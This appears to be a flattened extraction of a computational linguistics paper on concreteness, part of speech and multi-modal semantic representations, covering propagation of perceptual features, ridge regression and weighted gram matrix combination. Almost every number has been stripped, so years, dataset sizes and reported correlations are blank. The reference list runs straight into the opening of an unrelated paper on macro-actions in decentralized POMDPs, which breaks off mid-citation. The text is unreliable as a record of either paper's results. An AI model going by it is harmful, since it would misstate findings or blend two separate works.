quality. this highlights the need to consider the concreteness of the target do- main when constructing multi-modal models. to address ( ), we present various means of com- bining information from different modalities. we propose weighted gram matrix combination, a tech- nique in which representations of distinct modalities are mapped to a space of common dimension where coordinates reflect proximity to other concepts. this transformation, which has been shown to enhance semantic representations in the context of verb- clustering (reichart and korhonen, ), reduces representation sparsity and facilitates a product- based combination that results in greater inter-modal dependency. weighted gram matrix combination outperforms alternatives such as concatenation and canonical correlation analysis (cca) (hardoon et al., ) when combining representations from two similarly rich information sources. in section , we present experiments with linguis- tic features designed to address question ( ). these analyses are extended to multi-modal models in sec- tion , where we also address ( ) and ( ). we first discuss the relevance of concreteness and part-of- speech (lexical function) to concept representation. concreteness and word meaning a large and growing body of psychological evidence indicates differences between abstract and concrete concepts. it has been shown that concrete words are more easily learned, remembered and processed than abstract words (paivio, ; schwanenflugel and shoben, ), while neuroimaging studies demonstrate differences in brain activity when sub- jects are presented with stimuli corresponding to the two concept types (binder et al., ). the abstract/concrete distinction is important to computational semantics for various reasons. while many models construct representations of concrete words (andrews et al., ; landauer and dumais, ), abstract words are in fact far more common in everyday language. for instance, based on an analy- sis of those noun concepts in the university of south florida dataset (usf) and their occurrence in the british national corpus (bnc) (leech et al., ), % of noun tokens in corpora are rated by human here concreteness is understood intuitively, as per the psy- chological literature (rosen, ; gallese and lakoff, ). ● ●●● ●● mood praise beam clam sardine penguin look stab rule enjoy leave swingbelieve nouns verbs average concreteness rating figure : boxplot of concreteness distributions for noun and verb concepts in the usf data, with selected example concepts. the bold vertical line is the mean, boxes extend from the first to the third quartile, and dots represent outliers. judges as more abstract than the noun war, a concept that many would already consider quite abstract. the recent interest in multi-modal semantics fur- ther motivates a principled modelling approach to lexical concreteness. many multi-modal models im- plicitly distinguish concrete and abstract concepts since their perceptual input corresponds only to con- crete words (bruni et al., ; silberer and lapata, ; roller and schulte im walde, ). how- ever, given that many abstract concepts express re- lations or modifications of concrete concepts (gen- tner and markman, ), it is reasonable to expect that perceptual information about concrete concepts could also enhance the quality of more abstract rep- resentations in an appropriately constructed model. moreover, concreteness is closely related to more functional lexical distinctions, such as those be- tween adjectives, nouns and verbs. an analysis of the usf dataset, which includes concreteness ratings for over , words collected from thou- sands of participants, indicates that on average verbs (mean concreteness, . ) are considered more ab- stract than nouns (mean concreteness, . ), an ef- fect illustrated in figure . this connection be- tween lexical function and concreteness suggests that a sensitivity to concreteness could improve models that already make principled distinctions be- tween words based on their part-of-speech (pos) (im walde, ; baroni and zamparelli, ). although the focus of this paper is on multi- modal models, few conventional semantic mod- els make principled distinctions between concepts based on function or concreteness. before turning to the multi-modal case, we thus investigate whether this sample covers . % of all noun tokens in the bnc. these distinctions are pertinent to text-only models. concreteness and linguistic features it has long been known that aspects of word meaning can be inferred from nearby words in corpora. ap- proaches that exploit this fact are often called dis- tributional models (sahlgren, ; turney et al., ). we take a distributional approach to learn- ing linguistic representations. the advantage of us- ing distributional methods to learn representations from corpora versus approaches that rely on knowl- edge bases (pedersen et al., ; leong and mi- halcea, ) is that they are more scalable, easily applicable across languages and plausibly reflect the process of human word learning (landauer and du- mais, ; griffiths et al., ). we group dis- tributional features into three classes to test which forms of linguistic information are most pertinent to the abstract/concrete and verb/noun distinctions. all features are extracted from the google syntactic n-grams corpus. the dataset contains counted dependency-tree fragments for over bn words of the english google books corpus. . feature classes lexical features our lexical features are the co- occurrence counts of a concept word with each of the other , concepts in the usf data. co- occurrences are counted in a -word window, and, as elsewhere (erk and padó, ), weighted by point- wise mutual information (pmi) to control for the un- derlying frequency of both concept and word. pos-tag features many words function as more than one pos, and this variation can be indicative of meaning (manning, ). for example, deverbal context example indirect object gave it to the man noun direct object gave the pie to him concepts subject the man grinned in pp was in his mouth adject. modifier the portly man infinitive clause to eat is human transitive he bit the steak verb intransitive he salivated concepts distransitive put jam on the toast phrasal verb he gobbled it up infinitival comp. he wants to snooze clausal comp. i bet he won’t diet table : grammatical features for noun/verb concepts nouns, such as shiver or walk, often refer to pro- cesses rather than entities. to capture such effects, we count the frequency of occurrence with the pos categories ajdective, adverb, noun and verb. grammatical features grammatical role is a strong predictor of semantics (gildea and jurafsky, ). for instance, the subject of transitive verbs is more likely to refer to an animate entity than a noun chosen at random. syntactic context also pre- dicts verb semantics (kipper et al., ). we thus count the frequency of nouns in a range of (non- lexicalized) syntactic contexts, and of verbs in one of the six most common subcategorization-frame classes as defined in van de cruys et al. ( ). these contexts are detailed in table . . evaluation sets we create evaluation sets of abstract and con- crete concepts, and introduce a complementary di- chotomy between nouns and verbs, the two pos cat- egories most fundamental to propositional meaning. to construct these sets, we extract nouns and verbs from word pairs in the usf data based on their ma- jority pos-tag in the lemmatized bnc (leech et al., ), excluding any word not assigned to either of the pos categories in more than % of instances. from the resulting nouns and verbs, the abstract-concrete distinction is drawn by ordering words according to concreteness and sampling at random from the first and fourth quartiles. any con- crete nouns not occurring in the mcrae et al. ( ) property norm dataset were also excluded. concept type words pairs examples concrete nouns yacht, cup abstract nouns fear, respect all nouns cup, respect concrete verbs kiss, launch abstract verbs differ, obey all verbs kiss, differ table : evaluation sets used throughout. all nouns and all verbs are the union of abstract and concrete subsets and mixed abstract-concrete or concrete-abstract pairs. for each list of concepts l = concrete nouns, concrete verbs, abstract nouns, abstract verbs, to- gether with lists all nouns and all verbs, a corre- sponding set of pairs {(w ,w ) ∈ usf : w ,w ∈ l} is defined for evaluation. these details are sum- marized in table . evaluation lists, sets of pairs and usf scores are downloadable from our website. . evaluation methodology all models are evaluated by measuring correlations with the free-association scores in the usf dataset (nelson et al., ). this dataset contains the free- association strength of over , word pairs. these data reflect the cognitive proximity of con- cepts and have been widely used in nlp as a gold- standard for computational models (andrews et al., ; feng and lapata, ; silberer and lapata, ; roller and schulte im walde, ). for evaluation pairs (c ,c ) we calculate the co- sine similarity between our learned feature represen- tations for c and c , a standard measure of the prox- imity of two vectors (turney et al., ), and follow previous studies (leong and mihalcea, ; huang et al., ) in using spearman’s ρ as a measure of correlation between these values and our gold- standard. all representations in this section are combined by concatenation, since the present focus is not on combination methods. free-association strength is measured by presenting sub- jects with a cue word and asking them to produce the first word they can think of that is associated with that cue word. we consider spearman’s ρ, a non-parametric ranking cor- relation, to be more appropriate than pearson’s r for free asso- ciation data, which is naturally skewed and non-continuous. when combining multiple representations we normalize feature type all nouns conc. nouns abs. nouns all verbs conc. verbs abs. verbs ( ) lexical . * . * . * . * . * . ( ) pos-tag . * . . * . - . . ( ) grammatical . * . . * . - . . ( )+( )+( ) . * . * . * . * . * . table : spearman correlation ρ of cosine similarity between vector representations derived from three feature classes with usf scores. * indicates statistically significant correlations (p < . ). . results the performance of each feature class on the eval- uation sets is detailed in table . when all linguis- tic features are included, performance is somewhat better on noun concepts (ρ = . ) than verbs (ρ = . ). however, while correlations are sig- nificant on concrete (ρ = . ) and abstract nouns (ρ = . ) and concrete verbs, the effect is not significant on abstract verbs (although it is on verbs overall). the highest correlations for the linguistic features together are on abstract nouns (ρ = . ) and concrete verbs (ρ = . ). referring back to the continuum in figure , it is possible that there is an optimum concreteness level, exhibited by ab- stract nouns and concrete verbs, at which conceptual meaning is best captured by linguistic models. the results indicate that the three feature classes convey distinct information. it is perhaps unsur- prising that lexical features produce the best perfor- mance in the majority of cases; the value of lexical co-occurrence statistics in conveying word meaning is expressed in the well known distributional hy- pothesis (harris, ). more interestingly, on ab- stract concepts the contribution of pos-tag (nouns, ρ = . ; verbs, ρ = . ) and grammatical features (nouns, ρ = . ; verbs, ρ = . ) is no- tably higher than on the corresponding concrete con- cepts. the importance of such features to modelling free-association between abstract concepts suggests that they may convey information about how con- cepts are (subjectively) organized and interrelated in the minds of language users, independent of their realisation in the physical world. indeed, since ab- stract representations rely to a lesser extent than con- crete representations on perceptual input (section ), it is perhaps unsurprising that more of their meaning is reflected in subtle linguistic patterns. the results in this section demonstrate that differ- each representation, then concatenate and then renormalize. ent information is required to learn representations for abstract and concrete concepts and for noun and verb concepts. in the next section, we investigate how perceptual information fits into this equation. acquiring multi-modal representations as noted in section , there is experimental evi- dence that perceptual information plays a distinct role in the representation of different concept types. we explore whether this finding extends to com- putational models by integrating such information into our corpus-based approaches. we focus on two aspects of the integration process. propaga- tion: can models infer useful information about ab- stract nouns and verbs from perceptual information corresponding to concrete nouns? and combina- tion: how can linguistic and (propagated or actual) perceptual information be integrated into a single, multi-modal representation? we begin by introduc- ing the two sources of perceptual information. . perceptual information sources the mcrae dataset the mcrae et al. ( ) property norms dataset is commonly used as a per- ceptual information source in cognitively-motivated semantic models (kelly et al., ; roller and schulte im walde, ). the dataset contains prop- erties of over concrete noun concepts produced by human annotators. the proportion of sub- jects producing each property gives a measure of the strength of that property for a given concept. we en- code this data in vectors with coordinates for each of the , properties in the dataset. a concept rep- resentation contains (real-valued) feature strengths in places corresponding to the features of that con- cept and zeros elsewhere. having defined the con- crete noun evaluation set as the concepts found in both the usf and mcrae datasets, this informa- tion is available for all concrete nouns. the esp-game dataset to complement the cognitively-driven mcrae data with a more explic- itly visual information source, we also extract infor- mation from the esp-game dataset (von ahn and dabbish, ) of , photographs, each an- notated with a list of entities depicted in that im- age. this input enables connections to be made be- tween concepts that co-occur in scenes, and thus might be experienced together by language learn- ers at a given time. because we want our models to reflect human concept learning in inferring con- ceptual knowledge from comparatively unstructured data, we use the esp-game dataset in preference to resources such as imagenet (deng et al., ), in which the conceptual hierarchy is directly encoded by expert annotators. an additional motivation is that esp-game was produced by crowdsourcing a simple task with untrained annotators, and thus rep- resents a more scalable class of data source. we represent the esp-game data in , di- mensional vectors, with co-ordinates corresponding to each image in the dataset. a concept representa- tion contains a in any place that corresponds to an image in which the concept appears, and a other- wise. although it is possible to portray actions and processes in static images, and several of the esp- game images are annotated with verb concepts, for a cleaner analysis of the information propagation pro- cess we only include esp input in our models for the concrete nouns in the evaluation set. the data encoding outlined above results in per- ceptual representations of dimension ≈ , , for which, on average, fewer than . % of entries are non-zero . in contrast, in our full linguistic repre- sentations of nouns (dimension ≈ , ) and verbs (dimension ≈ , ) (section ), an average of % of entries are non-zero. one of the challenges for the propagation and combination methods described in the following subsections is therefore to manage the differences in dimension and sparsity between lin- guistic and perceptual representations. . information propagation johns and jones silberer and lapata ( ) ap- ply a method designed by johns and jones ( ) to the esp-game and mcrae representations are of approxi- mately equal sparsity. infer quasi-perceptual representations for a concept in the case that actual perceptual information is not available. translating their approach to the present context, for verbs and abstract nouns we infer quasi- perceptual representations based on the perceptual features of concrete nouns that are nearby in the se- mantic space defined by the linguistic features. in the first step of their two-step method, for each abstract noun or verb k, a quasi-perceptual represen- tation is computed as an average of the perceptual representations of the concrete nouns, weighted by the proximity between these nouns and k kp = ∑ c∈c̄ s(kl,cl)λ ·cp where c̄ is the set of concrete nouns, cp and kp are the perceptual representations for c and k respec- tively, and cl and kl the linguistic representations. the exponent parameter λ reflects the learning rate. following johns and jones ( ), we define the proximity function s between noun concepts to be cosine similarity. however, because our verb and noun representations are of different dimension, we take verb-noun proximity to be the pmi between the two words in the corpus, with co-occurrences counted within a -word window. in step two, the initial quasi-perceptual represen- tations are inferred for a second time, but with the weighted average calculated over the perceptual or initial quasi-perceptual representations of all other words, not just concrete nouns. as with johns and jones ( ), we set the learning rate parameter λ to be in the first step and in the second. ridge regression as an alternative propagation method we propose ridge regression (myers, ). ridge regression is a variant of least squares re- gression in which a regularization term is added to the training objective to favor solutions with cer- tain properties. here we apply it to learn parame- ters for linear maps from linguistic representations of concrete nouns to features in their perceptual rep- resentations. for concepts with perceptual represen- tations of dimension np, we learn np linear functions fi : rnl → r that map the linguistic representations (of dimension nl) to a particular perceptual feature i. these functions are then applied together to map the linguistic representations of abstract nouns and verbs to full quasi-perceptual representations. as our model is trained on concrete nouns but applied to other concept types, we do not wish the mapping to reflect the training data too faithfully. to mitigate against this we define our regulariza- tion term as the euclidian l norm of the inferred parameter vector. this term ensures that the regres- sion favors lower coefficients and a smoother solu- tion function, which should provide better general- ization performance than simple linear regression. the objective for learning the fi is then to minimize ‖ax −yi‖ + ‖a‖ where a is the vector of regression coefficients, x is a matrix of linguistic representations and yi a vector of perceptual feature i for the set of concrete nouns. we now investigate ways in which the (quasi-) perceptual representations acquired via these meth- ods can be combined with linguistic representations. . information combination canonical correlation analysis canonical cor- relation analysis (cca) (hardoon et al., ) is an established statistical method for exploring re- lationships between two sets of random variables. the method determines a linear transformation of the space spanned by each of the sets of variables, such that the correlations between the sets of trans- formed variables is maximized. silberer and lapata ( ) apply cca in the present context of information fusion, with one set of random variables corresponding to perceptual features and another corresponding to linguistic fea- tures. applied in this way, cca provides a mecha- nism for reducing the dimensionality of the linguis- tic and perceptual representations such that the im- portant interactions between them are preserved. the transformed linguistic and perceptual vectors are then concatenated. we follow silberer and lap- ata by applying a kernalized variant of cca. because the pos-tag and grammatical features are differ- ent for nouns and for verbs, we exclude them from our linguistic representations when implementing ridge regression. dimensionality reduction is desirable in the present context because of the sparsity of our perceptual representations. the kernelcca package in python: http://pythonhosted.org/apgl/kernelcca.html weighted gram matrix combination the method we propose as an alternative means of fusing linguistic and extra-linguistic information is weighted gram matrix combination, which derives from an information combination technique applied to verb clustering by reichart and korhonen ( ). for a set of concepts c = {c , . . . ,cn} with representations {r , . . . ,rn}, the method involves creating an n×n weighted gram matrix l in which lij = s(ri,rj) ·φ(ri) ·φ(rj). here, s is again a similarity function (we use cosine similarity), and φ(r) is the quality score of r. the quality scoring function φ can be any map- ping rn → r that reflects the importance of a con- cept relative to other concepts in c. in the present context, we follow reichart and korhonen ( ) in defining a quality score φ as the average cosine sim- ilarity of a concept with all other concepts in c φ(rj) = n n∑ i= s(ri,rj). for cj ∈ c, the matrix l then encodes a scalar pro- jection of rj onto the other members ri≤n, weighted by their quality. each word representation in the set is thus mapped into a new space of dimension n de- termined by the concepts in c. converting concept representations to weighted gram matrix form has several advantages in the present context. first, both when evaluating and applying semantic representations, we generally re- quire models to determine relations between con- cepts relative to others. we might, for instance, re- quire close associates of a given word, a selection of potential synonyms, or the two most similar search queries in a given set. this relative nature of seman- tics is reflected by projecting representations into a space defined by the set of concepts themselves, rather than low-level features. it is also captured by the quality weighting, which lends primacy to con- cept dimensions that are central to the space. second, mapping representations of different di- mension into vector spaces of equal dimension re- sults in dense representations of equal dimension for each modality. this naturally lends equal weighting or status to each modality and resolves any issues − . . . . lexical pos grammatical feature class p e rf o rm a n ce c h a n g e concrete nouns lexical pos grammatical abstract nouns (jj) lexical pos grammatical concrete verbs (jj) lexical pos grammatical abstract verbs (jj) perceptual information source mcrae esp mcrae & esp figure : additive change in spearman’s ρ when representations acquired from particular classes of linguistic features are combined with (actual or inferred) perceptual representations. perceptual representations are derived from either the mcrae dataset, the esp-game dataset or both (concatenated). for concepts other than concrete nouns, perceptual information is propagated using the johns and jones (jj) method, and combined with simple concatenation. of representations sparsity. in addition, the dimen- sion equality in particular enables a wider range of mathematical operations for combining information sources. here, we follow reichart and korhonen ( ) in taking the product of the linguistic and per- ceptual weighted gram matrices l and p , produc- ing a new matrix containing fused representations for each concept m = lppl. by taking the composite product lppl rather than lp or pl, m is symmetric and no ad hoc status is conferred to one modality over the other. . results the experiments in this section were designed to ad- dress the three questions specified in section : ( ) which information sources are important for acquir- ing word concepts of different types? ( ) can per- ceptual information be propagated from concrete to abstract concepts? ( ) what is the best way to com- bine the information from the different sources? question ( ) to build on insights from section , we first examined how perceptual input interacts with the three classes of linguistic features defined there. figure shows the additive difference in cor- relation between (i) models in which perceptual and particular linguistic features are concatenated and (ii) models based on just the linguistic features. for concrete nouns and concrete verbs, (actual or inferred) perceptual information was beneficial in almost all cases. the largest improvement for both concept types was over grammatical features, achieved by including only the mcrae data. this signals from this perceptual input and the grammat- ical features clearly reflect complementary aspects of the meaning of these concepts. we hypothe- size that grammatical features (and pos features, which also perform strongly in this combination) confer information to concrete representations about the function and mutual interaction of concepts (the most ‘relational’ aspects of their meaning (gentner, )) which complements the more intrinsic prop- erties conferred by perceptual features. for abstract concepts, it is perhaps unsurpris- ing that the overall contribution of perceptual in- formation was smaller. indeed, combining linguis- tic and perceptual information actually harmed per- formance on abstract verbs in all cases. for these concepts, the inferred perceptual features seem to obscure or contradict some of the information con- veyed in the linguistic representations. while the mcrae data was clearly the most valu- able source of perceptual input for concrete nouns and concrete verbs, for abstract nouns the combi- nation of esp-game and mcrae data was most in- formative. both inspection of the data and cogni- tive theories (rosch et al., ) suggest that enti- ties identified in scenes, as in the esp-game dataset, generally correspond to a particular (basic) level of model all nouns conc. nouns† abs. nouns all verbs conc. verbs abs. verbs linguistic . — . . — . . — . . — . . — . . — . (jj)+concat . — . . — . . — . . — . . — . . — . (jj)+cca . — . . — . . — - . . — . . — . . — . (jj)+wgm . — . . — . . — . . — . . — . - . — . rr+concat . — . . — . . — . . — . . — . rr+cca . — - . . — - . . — - . . — . . — . rr+wgm . — . . — . . — . . — . . — . lr+ . — . . — . . — . - . — . - . — . table : performance of different methods of information propagation (jj = johns and jones, rr = ridge regression, lr = linear regression) and combination (concat = concatenation, cca = canonical correlation analysis, wgm = weighted gram matrix multiplication) across evaluation sets. values are spearman’s ρ correlation with usf scores (left hand side of columns) and wordnet path similarity (right hand side). for the lr baseline we only report the highest score across the three combination types. †no propagation takes place for concrete nouns; this column reflects the performance of combination methods only. the conceptual hierarchy. the esp-game data re- flects relations between these basic-level concepts in the world, whereas the mcrae data typically de- scribes their (intrinsic) properties. together, these sources seem to combine information on the proper- ties of, and relations between, concepts in a way that particularly facilitates the learning of abstract nouns. question ( ) the performance of different meth- ods of information propagation and combination is presented in table . the underlying linguistic rep- resentations in this case contained all three distribu- tional feature classes. for more robust conclusions, in addition to the usf gold-standard we also mea- sured the correlation between model output and the wordnet path similarity of words in our evaluation pairs. the path similarity between words w and w is the shortest distance between synsets of w and w in the wordnet taxonomy (fellbaum, ), which correlates significantly with human judgements of concept similarity (pedersen et al., ). the correlations with the usf data (left hand col- umn, table ) of our linguistic-only models (ρ = . − . ) and best performing multi-modal models (on both concrete nouns, ρ = . , and more abstract concepts, ρ = . − . ) were higher than the best comparable models described elsewhere (feng and lapata, ; silberer and la- pata, ; silberer et al., ). this confirms other widely-used evaluation gold-standards, such as wordsim and the men dataset, do not contain a sufficient number of abstract concepts for the current purpose. feng and lapata ( ) report ρ = . for language-only both that the underlying linguistic space is of high quality and that the esp and mcrae perceptual in- put is similarly or more informative than the input applied in previous work. consistent with previous studies, adding percep- tual input improved the quality of concrete noun representations as measured against both usf and path similarity gold-standards. further, effective in- formation propagation was indeed possible for both abstract nouns (usf evaluation) and concrete verbs (both evaluations). interestingly, however, this was not the case for abstract verbs, for which no mix of propagation and combination methods produced an improvement on the linguistic-only model on either evaluation set. indeed, as shown in figure , no type of perceptual input generated an improvement in ab- stract verb representations, regardless of the under- lying class of linguistic features. this result underlines the link between concrete- ness, cognition and perception proposed in the psy- chological literature. more practically, it shows that concreteness can determine if propagation of per- ceptual input will be effective and, if so, the potential degree of improvement over text-only models. turning to means of propagation, both the johns and jones method and ridge regression outper- formed the linear regression baseline on the major- ity of concept types in our evaluation. across the five sets and ten evaluations on which propagation and . for multi-modal models evaluated on usf over concrete and abstract concepts. silberer and lapata ( ) report ρ = . (language-only) and . (multi-modal) over concrete nouns. takes place (all nouns, abstract nouns, all verbs, abstract verbs and concrete verbs), ridge regression performed more robustly, achieving the best perfor- mance on six evaluation sets compared to two for the johns and jones method. question ( ) weighted gram matrix multiplica- tion (ρ = . on usf and ρ = . on path sim- ilarity) outperformed both simple vector concatena- tion (ρ = . and ρ = . ) and cca (ρ = . and ρ = . ) on concrete nouns. in the case of both abstract nouns and concrete verbs, how- ever, the most effective means of combining quasi- perceptual information with linguistic representa- tions was concatenation (abstract nouns, ρ = . and ρ = . , concrete verbs, ρ = . and ρ = . ). one evident drawback of multiplica- tive methods such as weighted gram matrix combi- nation is the greater inter-dependence of the infor- mation sources; a weak signal from one modality can undermine the contribution of the other modal- ity. we hypothesize that this underlines the compar- atively poor performance of the method on verbs and abstract nouns, as the perceptual input for concrete nouns is clearly a richer information source than the propagated features of more abstract concepts. conclusion motivated by the inherent difference between ab- stract and concrete concepts and the observation that abstract words occur more frequently in language, in this paper we have addressed the question of whether multi-modal models can enhance semantic representations of both concept types. in section , we demonstrated that different infor- mation sources are important for acquiring concrete and abstract noun and verb concepts. within the lin- guistic modality, while lexical features are informa- tive for all concept types, syntactic features are only significantly informative for abstract concepts. in contrast, in section we observed that per- ceptual input is a more valuable information source for concrete concepts than abstract concepts. nev- ertheless, perceptual input can be effectively prop- agated from concrete nouns to enhance representa- tions of both abstract nouns and concrete verbs. in- for these comparisons, the optimal combination method is selected in each case. deed, conceptual concreteness appears to determine the degree to which perceptual input is beneficial, since representations of abstract verbs, the most ab- stract concepts in our experiments, were actually de- graded by this additional information. one impor- tant contribution of this work is therefore an insight into when multi-modal models should or should not aim to combine and/or propagate perceptual input to ensure that optimal representations are learned. in this respect, our conclusions align with the findings of kiela and hill ( ), who take an explicitly vi- sual approach to resolving the same question. various methods for propagating and combining perceptual information with linguistic input were presented. we proposed ridge regression for in- ferring perceptual representations for abstract con- cepts, which proved more robust than alternatives across the range of concept types. this approach is particularly simple to implement, since it is based on an established statistical prodedure. in addition, we introduced weighted gram matrix combination for combining representations from distinct modalities of differing sparsity and dimension. this method produces the highest quality composite representa- tions for concrete nouns, where both modalities rep- resent high quality information sources. overall, our results demonstrate that the potential practical benefits of multi-modal models extend be- yond concrete domains into a significant proportion of the lexical concepts found in language. in fu- ture work we aim to extend our experiments to con- cept types such as adjectives and adverbs, and to de- velop models that further improve the propagation and combination of extra-linguistic input. moreover, while we cannot draw definitive con- clusions about human language processing, the ef- fectiveness of the methods presented in this paper offer tentative support for the idea that even ab- stract concepts are grounded in the perceptual sys- tem (barsalou et al., ). as such, it may be that, even in the more abstract cases of human communi- cation, we find ways to see what people mean pre- cisely by finding ways to see what they mean. acknowledgements we thank the royal society and st john’s college for their support. references mark andrews, gabriella vigliocco, and david vinson. . integrating experiential and distributional data to learn semantic representations. psychological re- view, ( ): . marco baroni and roberto zamparelli. . nouns are vectors, adjectives are matrices: representing adjective-noun constructions in semantic space. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . association for computational linguis- tics. lawrence w barsalou, w kyle simmons, aron k bar- bey, and christine d wilson. . grounding conceptual knowledge in modality-specific systems. trends in cognitive sciences, ( ): – . jeffrey r binder, chris f westbury, kristen a mckier- nan, edward t possing, and david a medler. . distinct brain systems for processing concrete and ab- stract concepts. journal of cognitive neuroscience, ( ): – . elia bruni, gemma boleda, marco baroni, and nam- khanh tran. . distributional semantics in tech- nicolor. in proceedings of the th annual meet- ing of the association for computational linguistics: long papers-volume , pages – . association for computational linguistics. elia bruni, nam khanh tran, and marco baroni. . multimodal distributional semantics. journal of arti- ficial intelligence research, : – . jia deng, wei dong, richard socher, li-jia li, kai li, and li fei-fei. . imagenet: a large-scale hier- archical image database. in computer vision and pat- tern recognition, . cvpr , pages – . ieee. katrin erk and sebastian padó. . a structured vec- tor space model for word meaning in context. in pro- ceedings of the conference on empirical methods in natural language processing, pages – . asso- ciation for computational linguistics. christiane fellbaum. . wordnet. wiley online li- brary. yansong feng and mirella lapata. . visual infor- mation in semantic representation. in human lan- guage technologies: the annual conference of the north american chapter of the association for computational linguistics, pages – . association for computational linguistics. vittorio gallese and george lakoff. . the brain’s concepts: the role of the sensory-motor system in con- ceptual knowledge. cognitive neuropsychology, ( - ): – . dedre gentner and arthur b markman. . structure mapping in analogy and similarity. american psychol- ogist, ( ): . dedre gentner. . on relational meaning: the ac- quisition of verb meaning. child development, pages – . daniel gildea and daniel jurafsky. . automatic la- beling of semantic roles. computational linguistics, ( ): – . yoav goldberg and jon orwant. . a dataset of syntactic-ngrams over time from a very large corpus of english books. in second joint conference on lexical and computational semantics, association for com- putational linguistics, pages – . association for computational linguistics. thomas l griffiths, mark steyvers, and joshua b tenen- baum. . topics in semantic representation. psy- chological review, ( ): . david r hardoon, sandor szedmak, and john shawe- taylor. . canonical correlation analysis: an overview with application to learning methods. neu- ral computation, ( ): – . zellig harris. . distributional structure. word, ( ): – . felix hill, anna korhonen, and christian bentz. . a quantitative empirical analysis of the ab- stract/concrete distinction. cognitive science. eric h huang, richard socher, christopher d manning, and andrew y ng. . improving word representa- tions via global context and multiple word prototypes. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: long papers- volume , pages – . association for computa- tional linguistics. sabine schulte im walde. . experiments on the automatic induction of german semantic verb classes. computational linguistics, ( ): – . brendan t johns and michael n jones. . perceptual inference through global lexical similarity. topics in cognitive science, ( ): – . colin kelly, barry devereux, and anna korhonen. . acquiring human-like feature-based conceptual repre- sentations from corpora. in proceedings of the naacl hlt first workshop on computational neurolin- guistics, pages – . association for computational linguistics. douwe kiela and felix hill. . improving multi- modal representations using image dispersion: why less is sometimes more. in proceedings of acl , baltimore. association for computational linguistics. karin kipper, anna korhonen, neville ryant, and martha palmer. . a large-scale classification of english verbs. language resources and evaluation, ( ): – . thomas k landauer and susan t dumais. . a so- lution to plato’s problem: the latent semantic analysis theory of acquisition, induction, and representation of knowledge. psychological review, ( ): . geoffrey leech, roger garside, and michael bryant. . claws : the tagging of the british national cor- pus. in proceedings of the th conference on compu- tational linguistics-volume , pages – . associ- ation for computational linguistics. chee wee leong and rada mihalcea. . going be- yond text: a hybrid image-text approach for measur- ing word relatedness. in ijcnlp, pages – . christopher d manning. . part-of-speech tagging from % to %: is it time for some linguistics? in computational linguistics and intelligent text pro- cessing, pages – . springer. arthur b markman and edward j wisniewski. . similar and different: the differentiation of basic- level categories. journal of experimental psychology: learning, memory, and cognition, ( ). ken mcrae, george s cree, mark s seidenberg, and chris mcnorgan. . semantic feature production norms for a large set of living and non-living things. behavior research methods, ( ): – . raymond h myers. . classical and modern regres- sion with applications, volume . duxbury press bel- mont, ca. douglas l nelson, cathy l mcevoy, and thomas a schreiber. . the university of south florida free association, rhyme, and word fragment norms. be- havior research methods, instruments, & computers, ( ): – . allan paivio. . dual coding theory: retrospect and current status. canadian journal of psychology/revue canadienne de psychologie, ( ): . ted pedersen, siddharth patwardhan, and jason miche- lizzi. . wordnet:: similarity: measuring the relat- edness of concepts. in demonstration papers at hlt- naacl , pages – . association for computa- tional linguistics. roi reichart and anna korhonen. . improved lexical acquisition through dpp-based verb clustering. in proceedings of the conference of the association for computational linguistics (acl). association for computational linguistics. stephen roller and sabine schulte im walde. . a multimodal lda model integrating textual, cognitive and visual modalities. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , seattle, wash- ington, usa, october. association for computational linguistics. eleanor rosch, carolyn b mervis, wayne d gray, david m johnson, and penny boyes-braem. . basic objects in natural categories. cognitive psychol- ogy, ( ): – . gideon rosen. . nominalism, naturalism, epis- temic relativism. noûs, (s ): – . magnus sahlgren. . the word-space model: us- ing distributional analysis to represent syntagmatic and paradigmatic relations between words in high- dimensional vector spaces. ph.d. thesis, stockholm. paula j schwanenflugel and edward j shoben. . differential context effects in the comprehension of abstract and concrete verbal materials. journal of ex- perimental psychology: learning, memory, and cog- nition, ( ): . carina silberer and mirella lapata. . grounded models of semantic representation. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – . asso- ciation for computational linguistics. carina silberer, vittorio ferrari, and mirella lapata. . models of semantic representation with visual attributes. in proceedings of the th annual meet- ing of the association for computational linguistics, sofia, bulgaria. peter d turney, patrick pantel, et al. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, ( ): – . tim van de cruys, laura rimell, thierry poibeau, anna korhonen, et al. . multiway tensor factorization for unsupervised lexical acquisition. coling : technical papers, pages – . luis von ahn and laura dabbish. . labeling im- ages with a computer game. in proceedings of the sigchi conference on human factors in computing systems, pages – . acm. journal of artificial intelligence research ( ) - submitted / ; published / modeling and planning with macro-actions in decentralized pomdps christopher amato camato@ccs.neu.edu khoury college of computer sciences, northeastern university boston, ma usa george konidaris gdk@cs.brown.edu department of computer science, brown university providence, ri usa leslie p. kaelbling lpk@csail.mit.edu mit computer science and artificial intelligence laboratory cambridge, ma usa jonathan p. how jhow@mit.edu mit laboratory for information and decision systems cambridge, ma usa abstract decentralized partially observable markov decision processes (dec-pomdps) are gen- eral models for decentralized multi-agent decision making under uncertainty. however, they typically model a problem at a low level of granularity, where each agent’s actions are primitive operations lasting exactly one time step. we address the case where each agent has macro-actions: temporally extended actions that may require different amounts of time to execute. we model macro-actions as options in a dec-pomdp, focusing on actions that depend only on information directly available to the agent during execution. therefore, we model systems where coordination decisions only occur at the level of deciding which macro-actions to execute. the core technical difficulty in this setting is that the options chosen by each agent no longer terminate at the same time. we extend three leading dec- pomdp algorithms for policy generation to the macro-action case, and demonstrate their effectiveness in both standard benchmarks and a multi-robot coordination problem. the results show that our new algorithms retain agent coordination while allowing high-quality solutions to be generated for significantly longer horizons and larger state-spaces than pre- vious dec-pomdp methods. furthermore, in the multi-robot domain, we show that, in contrast to most existing methods that are specialized to a particular problem class, our approach can synthesize control policies that exploit opportunities for coordination while balancing uncertainty, sensor information, and information about other agents. . introduction the dec-pomdp (bernstein, givan, immerman, & zilberstein, ; oliehoek & amato, ) is a general framework for decentralized sequential decision-making under uncertainty and partial observability. dec-pomdps model problems where a team of agents shares the same objective function, but where each individual agent can only make noisy, partial ob- servations of the environment. solution methods for dec-pomdps aim to produce policies c© ai access foundation. all rights reserved. amato, konidaris, kaelbling & how that optimize reward while considering uncertainty in action outcomes, sensors, and infor- mation about the other agents. although much research has been conducted on solution methods for dec-pomdps, solving large instances remains intractable. advances have been made in optimal algorithms (see, for example, amato, chowdhary, geramifard, ure, & kochenderfer, ; amato, dibangoye, & zilberstein, ; aras, dutech, & charpillet, ; boularias & chaib- draa, ; dibangoye, amato, buffet, & 